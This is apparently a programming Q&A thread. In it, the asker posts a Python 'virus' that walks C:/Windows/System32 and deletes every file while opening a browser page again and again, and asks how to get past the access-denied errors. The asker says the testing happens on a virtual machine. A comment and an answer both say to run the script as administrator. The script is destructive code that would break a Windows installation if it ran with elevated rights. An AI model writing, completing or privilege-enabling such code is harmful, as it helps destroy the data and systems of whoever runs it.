# Python, how to delete system files with administrator permission

Tags: python, operating-system

I'm building a simple """virus""" for testing my basic abilities in python (obviously **I'm not share this file with others**, this have **only coding scope** and I'm testing on virtual machine). I'm trying to destruct my virtual machine deleting System32 files.
I've searched a lot online: *i've tested os.chmode* (also *with stat library*) and other methods, but i can't find a valid solution, and i wish I can find it here. This is my code:

```
import os
import webbrowser
from time import sleep

home="C:/Windows/System32"
for dirpath,dirnames,file in os.walk(home):
    webbrowser.open("https://cat-bounce.com/")
    for dirpath,dirnames,file in os.walk(home):
        for files in file:
            webbrowser.open("https://cat-bounce.com/")
            dirpath1=os.path.normpath(dirpath)
            childpath=os.path.join(dirpath1,files)
            try:
                os.remove(childpath)
            except PermissionError:
                print("denied")

sleep(1.5)
print("\nare you alive?")
```

for all the solution the output was "denied" (from the print). Without try and except the error was

```
PermissionError: [WinError 5] Access denied: 'C:/Windows/System32'
```

P.S: sorry for grammatical errors, I'm not english

Comment: You have to run the script from an administrator account. The script can't raise its privileges by itself.

Answer (score 1):

The easiest way is to run the code as an administrator.